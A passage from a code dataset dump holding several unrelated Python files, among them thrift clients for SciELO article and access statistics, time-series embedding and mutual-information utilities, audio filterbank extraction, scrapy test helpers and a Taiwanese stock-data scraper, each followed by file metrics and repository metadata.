print('~' * (8 + len(name)))
print()
print('::')
print()
for line in subparser.format_help().splitlines():
print(' ' + line)
print()
| 18.527027
| 68
| 0.56674
| 157
| 1,371
| 4.707006
| 0.363057
| 0.073072
| 0.032476
| 0.048714
| 0.135318
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00102
| 0.285193
| 1,371
| 73
| 69
| 18.780822
| 0.753061
| 0
| 0
| 0.173913
| 0
| 0
| 0.086194
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021739
| false
| 0
| 0.086957
| 0
| 0.130435
| 0.347826
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a5bc2b0b89e7e05fdfc86ac8ee4661e2d1a71f8f
| 13,303
|
py
|
Python
|
thrift/clients.py
|
fabiobatalha/processing
|
f3ad99e161de2befc7908168bfd7843f988c379d
|
[
"BSD-2-Clause"
] | null | null | null |
thrift/clients.py
|
fabiobatalha/processing
|
f3ad99e161de2befc7908168bfd7843f988c379d
|
[
"BSD-2-Clause"
] | null | null | null |
thrift/clients.py
|
fabiobatalha/processing
|
f3ad99e161de2befc7908168bfd7843f988c379d
|
[
"BSD-2-Clause"
] | null | null | null |
# coding: utf-8
import os
import thriftpy
import json
import logging
from thriftpy.rpc import make_client
from xylose.scielodocument import Article, Journal
LIMIT = 1000
logger = logging.getLogger(__name__)
ratchet_thrift = thriftpy.load(
os.path.join(os.path.dirname(__file__))+'/ratchet.thrift')
articlemeta_thrift = thriftpy.load(
os.path.join(os.path.dirname(__file__))+'/articlemeta.thrift')
citedby_thrift = thriftpy.load(
os.path.join(os.path.dirname(__file__))+'/citedby.thrift')
accessstats_thrift = thriftpy.load(
os.path.join(os.path.dirname(__file__))+'/access_stats.thrift')
publication_stats_thrift = thriftpy.load(
os.path.join(os.path.dirname(__file__))+'/publication_stats.thrift')
class ServerError(Exception):
def __init__(self, message=None):
self.message = message or 'thriftclient: ServerError'
def __str__(self):
return repr(self.message)
class AccessStats(object):
def __init__(self, address, port):
"""
Thrift client for Access Stats.
"""
self._address = address
self._port = port
@property
def client(self):
client = make_client(
accessstats_thrift.AccessStats,
self._address,
self._port
)
return client
def _compute_access_lifetime(self, query_result):
data = []
for publication_year in query_result['aggregations']['publication_year']['buckets']:
for access_year in publication_year['access_year']['buckets']:
data.append([
publication_year['key'],
access_year['key'],
int(access_year['access_html']['value']),
int(access_year['access_abstract']['value']),
int(access_year['access_pdf']['value']),
int(access_year['access_epdf']['value']),
int(access_year['access_total']['value'])
])
return sorted(data)
def access_lifetime(self, issn, collection, raw=False):
body = {
"query": {
"bool": {
"must": [{
"match": {
"collection": collection
}
},
{
"match": {
"issn": issn
}
}
]
}
},
"size": 0,
"aggs": {
"publication_year": {
"terms": {
"field": "publication_year",
"size": 0,
"order": {
"access_total": "desc"
}
},
"aggs": {
"access_total": {
"sum": {
"field": "access_total"
}
},
"access_year": {
"terms": {
"field": "access_year",
"size": 0,
"order": {
"access_total": "desc"
}
},
"aggs": {
"access_total": {
"sum": {
"field": "access_total"
}
},
"access_abstract": {
"sum": {
"field": "access_abstract"
}
},
"access_epdf": {
"sum": {
"field": "access_epdf"
}
},
"access_html": {
"sum": {
"field": "access_html"
}
},
"access_pdf": {
"sum": {
"field": "access_pdf"
}
}
}
}
}
}
}
}
query_parameters = [
accessstats_thrift.kwargs('size', '0')
]
query_result = json.loads(self.client.search(json.dumps(body), query_parameters))
computed = self._compute_access_lifetime(query_result)
return query_result if raw else computed
class PublicationStats(object):
def __init__(self, address, port):
"""
Thrift client for PublicationStats.
"""
self._address = address
self._port = port
@property
def client(self):
client = make_client(
publication_stats_thrift.PublicationStats,
self._address,
self._port
)
return client
def _compute_first_included_document_by_journal(self, query_result):
if len(query_result.get('hits', {'hits': []}).get('hits', [])) == 0:
return None
return query_result['hits']['hits'][0].get('_source', None)
def first_included_document_by_journal(self, issn, collection):
body = {
"query": {
"filtered": {
"query": {
"bool": {
"must": [
{
"match": {
"collection": collection
}
},
{
"match": {
"issn": issn
}
}
]
}
}
}
},
"sort": [
{
"publication_date": {
"order": "asc"
}
}
]
}
query_parameters = [
publication_stats_thrift.kwargs('size', '1')
]
query_result = json.loads(self.client.search('article', json.dumps(body), query_parameters))
return self._compute_first_included_document_by_journal(query_result)
def _compute_last_included_document_by_journal(self, query_result):
if len(query_result.get('hits', {'hits': []}).get('hits', [])) == 0:
return None
return query_result['hits']['hits'][0].get('_source', None)
def last_included_document_by_journal(self, issn, collection, metaonly=False):
body = {
"query": {
"filtered": {
"query": {
"bool": {
"must": [
{
"match": {
"collection": collection
}
},
{
"match": {
"issn": issn
}
}
]
}
},
"filter": {
"exists": {
"field": "publication_date"
}
}
}
},
"sort": [
{
"publication_date": {
"order": "desc"
}
}
]
}
query_parameters = [
publication_stats_thrift.kwargs('size', '1')
]
query_result = json.loads(self.client.search('article', json.dumps(body), query_parameters))
return self._compute_last_included_document_by_journal(query_result)
class Citedby(object):
def __init__(self, address, port):
"""
Thrift client for Citedby.
"""
self._address = address
self._port = port
@property
def client(self):
client = make_client(
citedby_thrift.Citedby,
self._address,
self._port
)
return client
def citedby_pid(self, code, metaonly=False):
data = self.client.citedby_pid(code, metaonly)
return data
class Ratchet(object):
def __init__(self, address, port):
"""
Thrift client for Ratchet.
"""
self._address = address
self._port = port
@property
def client(self):
client = make_client(
ratchet_thrift.RatchetStats,
self._address,
self._port
)
return client
def document(self, code):
data = self.client.general(code=code)
return data
class ArticleMeta(object):
def __init__(self, address, port):
"""
Thrift client for Articlemeta.
"""
self._address = address
self._port = port
@property
def client(self):
client = make_client(
articlemeta_thrift.ArticleMeta,
self._address,
self._port
)
return client
def journals(self, collection=None, issn=None):
offset = 0
while True:
identifiers = self.client.get_journal_identifiers(collection=collection, issn=issn, limit=LIMIT, offset=offset)
if len(identifiers) == 0:
return  # PEP 479: raising StopIteration inside a generator is an error in Python 3.7+
for identifier in identifiers:
journal = self.client.get_journal(
code=identifier.code[0], collection=identifier.collection)
jjournal = json.loads(journal)
xjournal = Journal(jjournal)
logger.info('Journal loaded: %s_%s' % ( identifier.collection, identifier.code))
yield xjournal
offset += 1000
def exists_article(self, code, collection):
try:
return self.client.exists_article(
code,
collection
)
except Exception:
msg = 'Error checking if document exists: %s_%s' % (collection, code)
raise ServerError(msg)
def set_doaj_id(self, code, collection, doaj_id):
try:
article = self.client.set_doaj_id(
code,
collection,
doaj_id
)
except Exception:
msg = 'Error setting doaj id for document: %s_%s' % (collection, code)
raise ServerError(msg)
def document(self, code, collection, replace_journal_metadata=True, fmt='xylose'):
try:
article = self.client.get_article(
code=code,
collection=collection,
replace_journal_metadata=True,
fmt=fmt
)
except Exception:
msg = 'Error retrieving document: %s_%s' % (collection, code)
raise ServerError(msg)
jarticle = None
try:
jarticle = json.loads(article)
except Exception:
msg = 'Failed to load JSON when retrieving document: %s_%s' % (collection, code)
raise ServerError(msg)
if not jarticle:
logger.warning('Document not found for : %s_%s' % ( collection, code))
return None
if fmt == 'xylose':
xarticle = Article(jarticle)
logger.info('Document loaded: %s_%s' % ( collection, code))
return xarticle
else:
logger.info('Document loaded: %s_%s' % ( collection, code))
return article
def documents(self, collection=None, issn=None, from_date=None,
until_date=None, fmt='xylose'):
offset = 0
while True:
identifiers = self.client.get_article_identifiers(
collection=collection, issn=issn, from_date=from_date,
until_date=until_date, limit=LIMIT, offset=offset)
if len(identifiers) == 0:
return  # PEP 479: raising StopIteration inside a generator is an error in Python 3.7+
for identifier in identifiers:
document = self.document(
code=identifier.code,
collection=identifier.collection,
replace_journal_metadata=True,
fmt=fmt
)
yield document
offset += 1000
def collections(self):
return [i for i in self.client.get_collection_identifiers()]
| 29.496674
| 123
| 0.42622
| 1,008
| 13,303
| 5.390873
| 0.15873
| 0.031285
| 0.027604
| 0.020611
| 0.544718
| 0.493927
| 0.467243
| 0.410563
| 0.349466
| 0.323151
| 0
| 0.004057
| 0.48117
| 13,303
| 451
| 124
| 29.496674
| 0.783251
| 0.014057
| 0
| 0.423188
| 0
| 0
| 0.090608
| 0.001923
| 0
| 0
| 0
| 0
| 0
| 1
| 0.075362
| false
| 0
| 0.017391
| 0.005797
| 0.171014
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a5be28a44a12bd589d156a3a7d0bbad6c6678d9a
| 6,705
|
py
|
Python
|
src/pypsr.py
|
wagglefoot/TVAE
|
74f8c5413d3c0d8607af50ddb0d96c4c2d477261
|
[
"MIT"
] | 22
|
2015-03-14T04:23:00.000Z
|
2022-03-24T03:29:22.000Z
|
src/pypsr.py
|
wagglefoot/TVAE
|
74f8c5413d3c0d8607af50ddb0d96c4c2d477261
|
[
"MIT"
] | null | null | null |
src/pypsr.py
|
wagglefoot/TVAE
|
74f8c5413d3c0d8607af50ddb0d96c4c2d477261
|
[
"MIT"
] | 15
|
2015-02-04T13:09:27.000Z
|
2022-03-24T03:29:24.000Z
|
from operator import sub
import numpy as np
from sklearn import metrics
from sklearn.neighbors import NearestNeighbors
from toolz import curry
def global_false_nearest_neighbors(x, lag, min_dims=1, max_dims=10, **cutoffs):
"""
Across a range of embedding dimensions $d$, embeds $x(t)$ with lag $\tau$, finds all nearest neighbors,
and computes the percentage of neighbors that remain neighbors when an additional dimension is unfolded.
See [1] for more information.
Parameters
----------
x : array-like
Original signal $x(t)$.
lag : int
Time lag $\tau$ in units of the sampling time $h$ of $x(t)$.
min_dims : int, optional
The smallest embedding dimension $d$ to test.
max_dims : int, optional
The largest embedding dimension $d$ to test.
relative_distance_cutoff : float, optional
The cutoff for determining neighborliness,
in distance increase relative to the original distance between neighboring points.
The default, 15, is suggested in [1] (p. 41).
relative_radius_cutoff : float, optional
The cutoff for determining neighborliness,
in distance increase relative to the radius of the attractor.
The default, 2, is suggested in [1] (p. 42).
Returns
-------
dims : ndarray
The tested dimensions $d$.
gfnn : ndarray
The percentage of nearest neighbors that are false neighbors at each dimension.
See Also
--------
reconstruct
References
----------
[1] Abarbanel, H. D. (1996). *Analysis of Observed Chaotic Data* (pp. 40-43). New York: Springer.
"""
x = _vector(x)
dimensions = np.arange(min_dims, max_dims + 1)
false_neighbor_pcts = np.array([_gfnn(x, lag, n_dims, **cutoffs) for n_dims in dimensions])
return dimensions, false_neighbor_pcts
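def _min_embedding_dim(x, lag, threshold=0.01):
    # Illustrative helper (not part of the original file): a common reading of the
    # GFNN curve is to take the smallest dimension whose false-neighbor fraction
    # falls below a small threshold.
    dims, gfnn = global_false_nearest_neighbors(x, lag)
    below = np.nonzero(gfnn <= threshold)[0]
    return dims[below[0]] if below.size else None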
def _gfnn(x, lag, n_dims, **cutoffs):
# Global false nearest neighbors at a particular dimension.
# Returns percent of all nearest neighbors that are still neighbors when the next dimension is unfolded.
# Neighbors that can't be embedded due to lack of data are not counted in the denominator.
offset = lag*n_dims
is_true_neighbor = _is_true_neighbor(x, _radius(x), offset)
return np.mean([
not is_true_neighbor(indices, distance, **cutoffs)
for indices, distance in _nearest_neighbors(reconstruct(x, lag, n_dims))
if (indices + offset < x.size).all()
])
def _radius(x):
# Per Abarbanel (p. 42):
# "the nominal 'radius' of the attractor defined as the RMS value of the data about its mean."
return np.sqrt(((x - x.mean())**2).mean())
@curry
def _is_true_neighbor(
x, attractor_radius, offset, indices, distance,
relative_distance_cutoff=15,
relative_radius_cutoff=2
):
distance_increase = np.abs(sub(*x[indices + offset]))
return (distance_increase / distance < relative_distance_cutoff and
distance_increase / attractor_radius < relative_radius_cutoff)
def _nearest_neighbors(y):
"""
Wrapper for sklearn.neighbors.NearestNeighbors.
Yields the indices of the neighboring points, and the distance between them.
"""
distances, indices = NearestNeighbors(n_neighbors=2, algorithm='kd_tree').fit(y).kneighbors(y)
for distance, index in zip(distances, indices):
yield index, distance[1]
def reconstruct(x, lag, n_dims):
"""Phase-space reconstruction.
Given a signal $x(t)$, dimensionality $d$, and lag $\tau$, return the reconstructed signal
\[
\mathbf{y}(t) = [x(t), x(t + \tau), \ldots, x(t + (d - 1)\tau)].
\]
Parameters
----------
x : array-like
Original signal $x(t)$.
lag : int
Time lag $\tau$ in units of the sampling time $h$ of $x(t)$.
n_dims : int
Embedding dimension $d$.
Returns
-------
ndarray
$\mathbf{y}(t)$ as an array with $d$ columns.
"""
x = _vector(x)
if lag * (n_dims - 1) >= x.shape[0] // 2:
raise ValueError('longest lag cannot be longer than half the length of x(t)')
lags = lag * np.arange(n_dims)
return np.vstack([x[lag:lag - lags[-1] or None] for lag in lags]).transpose()  # list, not generator: newer numpy rejects generators here
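def _demo_reconstruct():
    # Illustrative aside (not part of the original file): on a sine wave sampled at
    # h = 0.1, a lag of ~one quarter period makes the two delay coordinates trace a
    # circle; the output keeps len(x) - lag*(n_dims - 1) rows.
    t = np.arange(0, 100, 0.1)
    y = reconstruct(np.sin(t), lag=16, n_dims=2)
    return y.shape  # (len(t) - 16, 2)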
def ami(x, y=None, n_bins=10):
"""Calculate the average mutual information between $x(t)$ and $y(t)$.
Parameters
----------
x : array-like
y : array-like, optional
$x(t)$ and $y(t)$.
If only `x` is passed, it must have two columns;
the first column defines $x(t)$ and the second $y(t)$.
n_bins : int
The number of bins to use when computing the joint histogram.
Returns
-------
scalar
Average mutual information between $x(t)$ and $y(t)$, in nats (natural log equivalent of bits).
See Also
--------
lagged_ami
References
----------
Abarbanel, H. D. (1996). *Analysis of Observed Chaotic Data* (p. 28). New York: Springer.
"""
x, y = _vector_pair(x, y)
if x.shape[0] != y.shape[0]:
raise ValueError('timeseries must have the same length')
return metrics.mutual_info_score(None, None, contingency=np.histogram2d(x, y, bins=n_bins)[0])
def lagged_ami(x, min_lag=0, max_lag=None, lag_step=1, n_bins=10):
"""Calculate the average mutual information between $x(t)$ and $x(t + \tau)$, at multiple values of $\tau$.
Parameters
----------
x : array-like
$x(t)$.
min_lag : int, optional
The shortest lag to evaluate, in units of the sampling period $h$ of $x(t)$.
max_lag : int, optional
The longest lag to evaluate, in units of $h$.
lag_step : int, optional
The step between lags to evaluate, in units of $h$.
n_bins : int
The number of bins to use when computing the joint histogram in order to calculate mutual information.
See |ami|.
Returns
-------
lags : ndarray
The evaluated lags $\tau_i$, in units of $h$.
amis : ndarray
The average mutual information between $x(t)$ and $x(t + \tau_i)$.
See Also
--------
ami
"""
if max_lag is None:
max_lag = x.shape[0]//2
lags = np.arange(min_lag, max_lag, lag_step)
amis = [ami(reconstruct(x, lag, 2), n_bins=n_bins) for lag in lags]
return lags, np.array(amis)
def _vector_pair(a, b):
a = np.squeeze(a)
if b is None:
if a.ndim != 2 or a.shape[1] != 2:
raise ValueError('with one input, the array must be 2D with two columns')
a, b = a[:, 0], a[:, 1]
return a, np.squeeze(b)
def _vector(x):
x = np.squeeze(x)
if x.ndim != 1:
raise ValueError('x(t) must be a 1-dimensional signal')
return x
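def _first_ami_minimum(x, max_lag=200):
    # Illustrative helper (not part of the original file): the usual recipe for
    # choosing the embedding lag is the first local minimum of the lagged AMI curve.
    lags, amis = lagged_ami(x, min_lag=1, max_lag=max_lag)
    for i in range(1, len(amis) - 1):
        if amis[i] < amis[i - 1] and amis[i] < amis[i + 1]:
            return lags[i]
    return None  # no interior minimum found within the scanned range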
| 31.186047
| 113
| 0.631022
| 967
| 6,705
| 4.282316
| 0.240951
| 0.010142
| 0.01304
| 0.019319
| 0.242454
| 0.20285
| 0.177493
| 0.177493
| 0.177493
| 0.147549
| 0
| 0.01254
| 0.250708
| 6,705
| 214
| 114
| 31.331776
| 0.811704
| 0.537509
| 0
| 0.032258
| 0
| 0
| 0.069819
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.16129
| false
| 0
| 0.080645
| 0.016129
| 0.387097
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c01c3ac689a157ca3b1ed4911d58fd47e935434
| 1,050
|
py
|
Python
|
local/make_fbank.py
|
coolEphemeroptera/AESRC2020
|
b64cdeeaaf74e8c1a741930b3a47dc8dcadca8de
|
[
"Apache-2.0"
] | 35
|
2020-09-26T13:40:16.000Z
|
2022-03-22T19:42:20.000Z
|
local/make_fbank.py
|
coolEphemeroptera/ARNet
|
b64cdeeaaf74e8c1a741930b3a47dc8dcadca8de
|
[
"Apache-2.0"
] | 4
|
2021-04-10T13:05:52.000Z
|
2022-03-14T03:22:32.000Z
|
local/make_fbank.py
|
coolEphemeroptera/ARNet
|
b64cdeeaaf74e8c1a741930b3a47dc8dcadca8de
|
[
"Apache-2.0"
] | 7
|
2020-09-26T15:52:45.000Z
|
2021-06-11T05:05:23.000Z
|
import python_speech_features as psf
import soundfile as sf
# import scipy.io.wavfile as wav
import pickle as pkl
import sys
import os
import re
# linux to windows path conversion
def path_lin2win(path):
pattern = "/[a-z]/"
position = re.findall(pattern,path)[0][1].upper()
return re.sub(pattern,"%s:/"%position,path)
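# Illustrative aside (not part of the original file), with a hypothetical path:
def _demo_path_lin2win():
    assert path_lin2win("/e/LIBRISPEECH/dev.flac") == "E:/LIBRISPEECH/dev.flac"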
# save object to a pickle file
def save(data,path):
f = open(path,"wb")
pkl.dump(data,f)
f.close()
def path2utt(path):
return path.split('/')[-1].split('.')[0]
def fbank(path):
# path = path_lin2win(path) # windows path
y,sr = sf.read(path)
mel = psf.fbank(y,samplerate=sr,nfilt=80)[0]
return mel
if __name__ == "__main__":
audio_file = sys.argv[1]
# audio_file = r"E:/LIBRISPEECH/LibriSpeech/dev/dev-clean/1272/128104/1272-128104-0000.flac"
out_file = sys.argv[2]
out_dir = os.path.dirname(out_file)  # renamed from `dir` to avoid shadowing the builtin
if not os.path.isdir(out_dir): os.mkdir(out_dir)  # bug fix: original created out_file instead of the directory
mel = fbank(audio_file)
save(mel,out_file)
print(path2utt(out_file),mel.shape[0])
exit()
| 23.863636
| 97
| 0.631429
| 161
| 1,050
| 3.993789
| 0.484472
| 0.054432
| 0.046656
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.046341
| 0.219048
| 1,050
| 43
| 98
| 24.418605
| 0.737805
| 0.179048
| 0
| 0
| 0
| 0
| 0.028395
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.137931
| false
| 0
| 0.206897
| 0.034483
| 0.448276
| 0.034483
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c0299abc0c111e544b5842dcd9b42f82f6088c5
| 1,344
|
py
|
Python
|
tests/__init__.py
|
jun-kai-xin/douban
|
989a797de467f5a9a8b77a05fa8242bebf657a51
|
[
"MIT"
] | null | null | null |
tests/__init__.py
|
jun-kai-xin/douban
|
989a797de467f5a9a8b77a05fa8242bebf657a51
|
[
"MIT"
] | null | null | null |
tests/__init__.py
|
jun-kai-xin/douban
|
989a797de467f5a9a8b77a05fa8242bebf657a51
|
[
"MIT"
] | null | null | null |
def fake_response_from_file(file_name, url=None, meta=None):
import os
import codecs
from scrapy.http import HtmlResponse, Request
if not url:
url = 'http://www.example.com'
_meta = {'mid': 1291844, 'login': False}  # required info; any value will do
if meta:
meta.update(_meta)
else:
meta = _meta
request = Request(url=url, meta=meta)
if not file_name[0] == '/':
responses_dir = os.path.dirname(os.path.realpath(__file__))
file_path = os.path.join(responses_dir, file_name)
else:
file_path = file_name
with codecs.open(file_path, 'r', 'utf-8') as f:
file_content = f.read()
response = HtmlResponse(url=url,
encoding='utf-8',
request=request,
body=file_content)
return response
def fake_response_from_url(url, headers=None, meta=None):
import requests
from scrapy.http import HtmlResponse, Request
resp = requests.get(url, headers=headers)
_meta = {'mid': 1291844, 'login': False}  # required info; any value will do
if meta:
meta.update(_meta)
else:
meta = _meta
return HtmlResponse(url=url, status=resp.status_code, body=resp.text,
encoding='utf-8', request=Request(url=url, meta=meta))
| 28.595745
| 78
| 0.590774
| 165
| 1,344
| 4.642424
| 0.333333
| 0.046997
| 0.039164
| 0.049608
| 0.4047
| 0.355091
| 0.180157
| 0.180157
| 0.180157
| 0.180157
| 0
| 0.019088
| 0.298363
| 1,344
| 46
| 79
| 29.217391
| 0.793213
| 0.021577
| 0
| 0.371429
| 0
| 0
| 0.041921
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057143
| false
| 0
| 0.142857
| 0
| 0.257143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c045b5de4e55fe90b3f8563b224a0193ac2dff7
| 6,917
|
py
|
Python
|
stockBOT/Discord/fc_info.py
|
Chenct-jonathan/LokiHub
|
7193589151e88f4e66aee6457926e565d0023fa1
|
[
"MIT"
] | 17
|
2020-11-25T07:40:18.000Z
|
2022-03-07T03:29:18.000Z
|
stockBOT/Discord/fc_info.py
|
Chenct-jonathan/LokiHub
|
7193589151e88f4e66aee6457926e565d0023fa1
|
[
"MIT"
] | 8
|
2020-12-18T13:23:59.000Z
|
2021-10-03T21:41:50.000Z
|
stockBOT/Discord/fc_info.py
|
Chenct-jonathan/LokiHub
|
7193589151e88f4e66aee6457926e565d0023fa1
|
[
"MIT"
] | 43
|
2020-12-02T09:03:57.000Z
|
2021-12-23T03:30:25.000Z
|
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
from bs4 import BeautifulSoup
import requests
from requests import post
from requests import codes
def information(symbol):
URL = "https://goodinfo.tw/StockInfo/StockDetail.asp?STOCK_ID="+ symbol
headers = {'user-agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'}
r = requests.post(url=URL,headers=headers)
html = BeautifulSoup(r.content, "html.parser")
result_infoDICT = {}
table = html.findAll("table")[40]
table_row_name=table.findAll("tr")[1]
td_name = table_row_name.findAll("td")[1]
name = td_name.text
result_infoDICT["name"] = name
table_row_industry=table.findAll("tr")[2]
td_industry=table_row_industry.findAll("td")[1]
industry=td_industry.text
result_infoDICT["industry"] = industry
table_row_value=table.findAll("tr")[4]
td_value = table_row_value.findAll("td")[3]
value = td_value.text
result_infoDICT["value"] = value
table_row_business=table.findAll("tr")[14]
td_business = table_row_business.findAll("td")[0]
business = td_business.text
result_infoDICT["business"] = business
return result_infoDICT
def growth(symbol):
URL = "https://goodinfo.tw/StockInfo/StockFinDetail.asp?RPT_CAT=XX_M_QUAR_ACC&STOCK_ID="+ symbol
headers = {'user-agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'}
r = requests.post(url=URL,headers=headers)
html = BeautifulSoup(r.content, "html.parser")
result_growthDICT = {}
table = html.findAll("table")[16]
table_row_quarter=table.findAll("tr")[0]
th_quarter = table_row_quarter.findAll("th")[1]
quarter = th_quarter.text
result_growthDICT["quarter"] = quarter
table_row_revenue=table.findAll("tr")[14]
td_revenue = table_row_revenue.findAll("td")[1]
revenue_YOY = td_revenue.text
result_growthDICT["revenue_YOY"] = revenue_YOY
table_row_gross_profit = table.findAll("tr")[15]
td_gross_profit = table_row_gross_profit.findAll("td")[1]
gross_profit_YOY = td_gross_profit.text
result_growthDICT["gross_profit_YOY"] = gross_profit_YOY
table_row_operating_income=table.findAll("tr")[16]
td_operating_income = table_row_operating_income.findAll("td")[1]
operating_income_YOY = td_operating_income.text
result_growthDICT["operating_income_YOY"] = operating_income_YOY
table_row_NIBT=table.findAll("tr")[17]
td_NIBT = table_row_NIBT.findAll("td")[1]
NIBT_YOY = td_NIBT.text
result_growthDICT["NIBT_YOY"] = NIBT_YOY
table_row_NI=table.findAll("tr")[18]
td_NI = table_row_NI.findAll("td")[1]
NI_YOY = td_NI.text
result_growthDICT["NI_YOY"] = NI_YOY
table_row_EPS=table.findAll("tr")[20]
td_EPS = table_row_EPS.findAll("td")[1]
EPS_YOY = td_EPS.text
result_growthDICT["EPS_YOY"] = EPS_YOY
table_row_total_assets_growth=table.findAll("tr")[50]
td_total_assets_growth = table_row_total_assets_growth.findAll("td")[1]
total_assets_growth = td_total_assets_growth.text
result_growthDICT["total_assets_growth"] = total_assets_growth
return result_growthDICT
def profitability(symbol):
URL = "https://goodinfo.tw/StockInfo/StockFinDetail.asp?RPT_CAT=XX_M_QUAR_ACC&STOCK_ID="+ symbol
headers = {'user-agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'}
r = requests.post(url=URL,headers=headers)
html = BeautifulSoup(r.content, "html.parser")
result_profitabilityDICT = {}
table = html.findAll("table")[16]
table_row_quarter=table.findAll("tr")[0]
th_quarter = table_row_quarter.findAll("th")[1]
quarter = th_quarter.text
result_profitabilityDICT["quarter"] = quarter
table_row_GPM=table.findAll("tr")[1]
td_GPM = table_row_GPM.findAll("td")[1]
GPM = td_GPM.text
result_profitabilityDICT["GPM"] = GPM
table_row_OPM=table.findAll("tr")[2]
td_OPM = table_row_OPM.findAll("td")[1]
OPM = td_OPM.text
result_profitabilityDICT["OPM"] = OPM
table_row_PTPM=table.findAll("tr")[3]
td_PTPM = table_row_PTPM.findAll("td")[1]
PTPM = td_PTPM.text
result_profitabilityDICT["PTPM"] = PTPM
table_row_NPM=table.findAll("tr")[4]
td_NPM = table_row_NPM.findAll("td")[1]
NPM = td_NPM.text
result_profitabilityDICT["NPM"] = NPM
table_row_EPS=table.findAll("tr")[7]
td_EPS = table_row_EPS.findAll("td")[1]
EPS = td_EPS.text
result_profitabilityDICT["EPS"] = EPS
table_row_NASPS=table.findAll("tr")[8]
td_NASPS = table_row_NASPS.findAll("td")[1]
NASPS = td_NASPS.text
result_profitabilityDICT["NASPS"] = NASPS
table_row_ROW=table.findAll("tr")[9]
td_ROE = table_row_ROW.findAll("td")[1]
ROE = td_ROE.text
result_profitabilityDICT["ROE"] = ROE
table_row_ROA=table.findAll("tr")[11]
td_ROA = table_row_ROA.findAll("td")[1]
ROA = td_ROA.text
result_profitabilityDICT["ROA"] = ROA
return result_profitabilityDICT
def safety(symbol):
URL = "https://goodinfo.tw/StockInfo/StockFinDetail.asp?RPT_CAT=XX_M_QUAR_ACC&STOCK_ID="+ symbol
headers = {'user-agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'}
r = requests.post(url=URL,headers=headers)
html = BeautifulSoup(r.content, "html.parser")
result_safetyDICT = {}
table = html.findAll("table")[16]
table_row_quarter=table.findAll("tr")[75]
th_quarter = table_row_quarter.findAll("td")[1]
quarter = th_quarter.text
result_safetyDICT["quarter"] = quarter
table_row_CR=table.findAll("tr")[76]
td_CR = table_row_CR.findAll("td")[1]
CR = td_CR.text
result_safetyDICT["CR"] = CR
table_row_QR=table.findAll("tr")[77]
td_QR = table_row_QR.findAll("td")[1]
QR = td_QR.text
result_safetyDICT["QR"] = QR
table_row_current_ratio=table.findAll("tr")[78]
td_current_ratio = table_row_current_ratio.findAll("td")[1]
current_ratio = td_current_ratio.text
result_safetyDICT["current_ratio"] = current_ratio
table_row_ICR=table.findAll("tr")[79]
td_ICR = table_row_ICR.findAll("td")[1]
ICR = td_ICR.text
result_safetyDICT["ICR"] = ICR
table_row_OCFR=table.findAll("tr")[80]
td_OCFR = table_row_OCFR.findAll("td")[1]
OCFR = td_OCFR.text
result_safetyDICT["OCFR"] = OCFR
table_row_DR=table.findAll("tr")[56]
td_DR = table_row_DR.findAll("td")[1]
DR = td_DR.text
result_safetyDICT["DR"] = DR
return result_safetyDICT
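# Usage sketch (added for illustration, not part of the original script):
# assuming goodinfo.tw still serves this table layout, each scraper takes a
# TWSE ticker string; "2330" below is purely an example symbol.
if __name__ == "__main__":
    print(profitability("2330"))
    print(safety("2330"))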
| 32.474178
| 134
| 0.675293
| 976
| 6,917
| 4.506148
| 0.128074
| 0.101864
| 0.089131
| 0.020009
| 0.359936
| 0.31719
| 0.28513
| 0.28513
| 0.28513
| 0.271942
| 0
| 0.031947
| 0.189967
| 6,917
| 213
| 135
| 32.474178
| 0.752989
| 0.006072
| 0
| 0.182432
| 0
| 0.027027
| 0.160774
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027027
| false
| 0
| 0.027027
| 0
| 0.081081
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
